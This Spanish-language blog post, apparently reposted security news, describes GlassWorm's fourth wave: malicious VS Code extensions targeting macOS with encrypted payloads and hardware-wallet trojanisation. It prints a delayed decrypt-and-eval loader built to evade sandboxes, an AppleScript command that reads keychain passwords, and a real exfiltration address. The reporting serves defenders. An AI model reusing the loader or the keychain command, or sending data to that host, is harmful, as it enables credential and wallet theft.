Una nueva ola de malware GlassWorm ha surgido, marcando un cambio significativo en la estrategia de targeting de Windows a sistemas macOS. Este gusano autopropagable, distribuido a través de extensiones maliciosas de VS Code en el mercado Open VSX, ya ha acumulado más de 50.000 descargas. La cuarta ola introduce varios cambios preocupantes, incluyendo payloads encriptados, capacidades de trojanización de billeteras de hardware y sofisticadas técnicas de evasión de sandbox que le permiten eludir las herramientas de escaneo de seguridad tradicionales. El actor de la amenaza detrás de GlassWorm ha demostrado ser notablemente adaptable, evolucionando a través de cuatro olas distintas desde octubre.
Campañas anteriores dependían de caracteres Unicode invisibles y binarios Rust compilados para ocultar código malicioso.
La iteración más reciente abandona estos enfoques en favor de payloads JavaScript encriptados con AES-256-CBC específicamente diseñados para entornos macOS.
.webp)
Payload Encriptado y Tácticas de Evasión de Sandbox
La cuarta ola introduce un ingenioso mecanismo de temporización diseñado para evadir el análisis de seguridad automatizado. Una vez instalado, la extensión maliciosa espera exactamente 15 minutos antes de ejecutar su payload. Este retraso es crítico porque la mayoría de los entornos sandbox se agotan después de 5 minutos, lo que significa que el malware aparece completamente benigno durante el escaneo automatizado. El código contiene un valor codificado de 9e5 milisegundos (900.000 milisegundos equivalen a 15 minutos), que desencadena la desencriptación y ejecución del payload encriptado con AES-256-CBC.setTimeout(() => {
const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
let payload = decrypted.update(encryptedData, 'base64', 'utf8');
payload += decrypted.final('utf8');
eval(payload);
}, 9e5);
set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"
El malware también incluye la capacidad de reemplazar las aplicaciones de billeteras de hardware con versiones trojanizadas, apuntando tanto a Ledger Live como a Trezor Suite.
Si bien la funcionalidad de reemplazo de billetera no estaba completamente activa durante las pruebas el 29 de diciembre de 2025, la infraestructura del código está completa y a la espera de cargas útiles.
El malware valida que los archivos descargados superen los 1000 bytes antes de la instalación, evitando instalaciones rotas que puedan alertar a las víctimas.
Todos los datos robados se almacenan en el directorio temporal /tmp/ijewf/, se comprimen y se envían al servidor de exfiltración en 45.32.150.251/p2p para su recuperación por parte del atacante.Fuentes:
https://cybersecuritynews.com/self-propagating-glassworm-weaponizing-vs-code/
No hay comentarios:
Publicar un comentario